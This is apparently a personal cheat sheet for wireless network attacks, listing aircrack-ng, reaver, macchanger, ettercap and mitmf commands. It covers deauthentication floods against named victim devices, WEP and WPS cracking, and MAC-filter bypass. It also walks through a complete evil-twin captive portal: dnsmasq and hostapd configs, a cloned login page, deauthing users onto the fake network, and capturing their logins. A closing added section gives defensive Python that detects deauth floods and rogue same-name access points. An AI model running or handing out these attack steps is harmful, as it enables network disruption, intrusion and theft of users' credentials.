NETWORK HACKING

Changing the MAC address:
ifconfig wlan0 hw ether (mac)

Checking the interface mode (master, managed, monitor):
iwconfig

Putting the interface down:
ifconfig wlan0 down

Killing interfering processes:
airmon-ng check kill

Changing the interface to monitor mode:
airmon-ng start wlan0            (interface becomes wlan0mon)
iwconfig wlan0 mode monitor      (mon0)

Bringing the interface up:
ifconfig wlan0 up

Listing broadcasting devices (2.4 GHz only, or both 2.4 and 5 GHz):
airodump-ng (interface in monitor mode)
airodump-ng --band abg (interface in monitor mode)

Listening on a specific device:
airodump-ng --bssid (mac) --channel (number) --write test (interface in monitor mode)
airodump-ng --band abg --bssid (mac) --channel (number) --write test (interface in monitor mode)

DEAUTHENTICATION ATTACK
Specific device connected to the wireless router:
aireplay-ng --deauth 10000000 -a (router mac) -c (victim mac) (interface in monitor mode)

Multiple devices (each run in the background):
aireplay-ng --deauth 10000000 -a (router mac) -c (victim1 mac) (interface in monitor mode) &>/dev/null &
aireplay-ng --deauth 10000000 -a (router mac) -c (victim2 mac) (interface in monitor mode) &>/dev/null &

Listing background jobs:
jobs

Killing jobs:
kill %1               (kills one job)
killall aireplay-ng   (kills all aireplay-ng jobs)

Deauth all clients on a router:
airodump-ng --bssid (router mac) --channel (number) (interface in monitor mode)
aireplay-ng --deauth 10000000 -a (router mac) (interface in monitor mode)

BREAKING WEP ENCRYPTION
Simple crack on a busy network:
airodump-ng --bssid (mac) --channel (number) --write test (interface in monitor mode)
aircrack-ng (captured file)

If the network is not busy:
airodump-ng --bssid (mac) --channel (number) --write test (interface in monitor mode)
Associating with the target device:
aireplay-ng --fakeauth 0 -a (router mac) -h (attacker mac) (interface in monitor mode)
Forcing the AP to generate new IVs:
aireplay-ng --arpreplay -b (router mac) -h (attacker mac) (interface in monitor mode)
For SKA (Shared Key Authentication) networks:
aireplay-ng --arpreplay -b (router mac) -h (connected device mac) (interface in monitor mode)
aircrack-ng (captured file)

WPA/WPA2 CRACKING
Attacking WPS:
wash -i (monitor mode interface)
Associating with the target device:
aireplay-ng --fakeauth 30 -a (router mac) -h (attacker mac) (interface in monitor mode)
reaver --bssid (target mac) --channel (number) -i (monitor mode interface) -vvv --no-associate

GAINING ACCESS
Targeting a hidden network:
airodump-ng (interface in monitor mode)
airodump-ng --bssid (router mac) --channel (number) (interface in monitor mode)
aireplay-ng --deauth 2 -a (router mac) -c (victim mac) (interface in monitor mode)

MAC filtering bypass, whitelist mode:
airodump-ng (interface in monitor mode)
airodump-ng --bssid (router mac) --channel (number) (interface in monitor mode)
Connecting to the hidden network: put the interface back into managed mode
airmon-ng stop (monitor mode interface)  /  iwconfig (monitor mode interface) mode managed
ifconfig wlan0 down
macchanger -m (connected device mac) wlan0
For blacklist mode, only randomize the MAC address:
macchanger -r wlan0

WAYS FOR ATTACKING CAPTIVE PORTALS (OPEN WIFI NETWORKS)
1. Changing the MAC address
2. Sniffing logins in monitor mode
3. Connect and sniff logins after running an ARP spoofing attack
4. Create a fake AP and ask users to log in

Details

Sniffing logins in monitor mode:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
iwconfig
airodump-ng (interface in monitor mode)
airodump-ng --bssid (router mac) --channel (number) --write captivefile (interface in monitor mode)
Deauth the connected client:
aireplay-ng --deauth 10000000 -a (router mac) -c (victim mac) (interface in monitor mode)
Open Wireshark to capture the packets.

Connect and sniff logins after running an ARP spoofing attack (in Wireshark):
[+] mitmf --arp --spoof -i wlan0 --gateway (ip)
    Run route -n for the gateway IP.
[+] ettercap -Tq -M arp:remote -i wlan0 /// ///
    /// /// means sniffing on the whole connected network.

Create a fake AP and ask users to log in:
[] Clone the login page of the network
[] Create a fake AP with the same name
Disable network-manager:
service network-manager stop

OPTIONAL COMMANDS TO AVOID IPTABLES INTERFERENCE
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT

CONFIGURING DNSMASQ
(dnsmasq conf file)
# wifi interface
interface=wlan0
# ip range that can be given to clients
dhcp-range=10.0.0.10,10.0.0.100,8h
# gateway ip address
dhcp-option=3,10.0.0.1
# dns server address
dhcp-option=6,10.0.0.1
# redirect all requests to 10.0.0.1
address=/#/10.0.0.1
Run on the terminal:
dnsmasq -C (directory of dnsmasq conf file)

CONFIGURING HOSTAPD
(hostapd conf file)
# wifi interface
interface=wlan0
# network name (same as the captive portal name)
ssid=mywifi
# channel
channel=1
# driver
driver=nl80211
hostapd (directory of hostapd conf file) -B
ifconfig wlan0 10.0.0.1 netmask 255.255.255.0
service apache2 start

Enabling HTTPS on localhost:
openssl req -new -x509 -days 3650 -out cert.pem -keyout cert.key
a2enmod ssl
nano /etc/apache2/sites-enabled/000-default.conf
<VirtualHost *:443>
    SSLEngine On
    SSLCertificateFile (directory of cert.pem)
    SSLCertificateKeyFile (directory of cert.key)
</VirtualHost>
nano /etc/apache2/ports.conf
Listen 443
service apache2 restart

[] Deauth users so they use the fake network with the cloned page:
aireplay-ng --deauth 10000000 -a (router mac) -c (victim1 mac) (interface in monitor mode) &>/dev/null &
aireplay-ng --deauth 10000000 -a (router mac) -c (victim2 mac) (interface in monitor mode) &>/dev/null &
[] Sniff the login info:
hostapd (directory of hostapd conf file) -B
tshark -i wlan0 -w mywifi.cap
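As an added example (not part of the original notes), the following Python flags the two attacks described above from the defender's side: a deauth flood of the kind aireplay-ng --deauth produces, and a fake AP beaconing the same SSID from a BSSID that is not ours. The frame record shape, the MAC addresses and the timings are assumptions constructed for the example, not data from the notes.

```python
# Added example (not from the original notes): detection logic for a deauth flood and a
# same-name fake AP, run over constructed 802.11 management-frame records shaped as
# (timestamp_s, subtype, src_mac, dst_mac, bssid, ssid), as a wireless IDS or a tshark
# field export might provide them. Every address and timestamp below is made up.
from collections import defaultdict

DEAUTH_THRESHOLD = 20   # deauth frames from one source within one window
WINDOW_SECONDS = 10.0

LEGIT_BSSID = "aa:bb:cc:dd:ee:01"
CLIENT = "11:22:33:44:55:66"
# Constructed capture: a normal beacon, one benign deauth, a 25-frame deauth burst
# that spoofs the router address, then a rogue AP beaconing the same SSID.
FRAMES = [
    (0.0, "beacon", LEGIT_BSSID, "ff:ff:ff:ff:ff:ff", LEGIT_BSSID, "mywifi"),
    (0.5, "deauth", LEGIT_BSSID, CLIENT, LEGIT_BSSID, ""),
]
FRAMES += [(1.0 + 0.1 * i, "deauth", LEGIT_BSSID, CLIENT, LEGIT_BSSID, "") for i in range(25)]
FRAMES.append((4.0, "beacon", "de:ad:be:ef:00:01", "ff:ff:ff:ff:ff:ff", "de:ad:be:ef:00:01", "mywifi"))
# SSIDs we operate, mapped to the BSSIDs allowed to advertise them (assumed inventory).
AUTHORIZED = {"mywifi": {LEGIT_BSSID}}


def deauth_floods(frames, threshold=DEAUTH_THRESHOLD, window=WINDOW_SECONDS):
    """Return {src_mac: peak_count} for sources sending >= threshold deauths in any window."""
    stamps = defaultdict(list)
    for ts, subtype, src, _dst, _bssid, _ssid in frames:
        if subtype == "deauth":
            stamps[src].append(ts)
    alerts = {}
    for src, times in stamps.items():
        times.sort()
        start = 0
        for end, ts in enumerate(times):          # sliding window over sorted timestamps
            while ts - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                alerts[src] = max(alerts.get(src, 0), count)
    return alerts


def evil_twins(frames, authorized=AUTHORIZED):
    """Return {ssid: {bssid, ...}} for beacons advertising one of our SSIDs from an unlisted BSSID."""
    rogue = defaultdict(set)
    for _ts, subtype, _src, _dst, bssid, ssid in frames:
        if subtype == "beacon" and ssid in authorized and bssid.lower() not in authorized[ssid]:
            rogue[ssid].add(bssid.lower())
    return dict(rogue)
```

On the constructed capture, deauth_floods(FRAMES) reports the spoofed router address with 26 frames in the window and evil_twins(FRAMES) reports the rogue BSSID under "mywifi"; a single legitimate deauth stays below the threshold.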
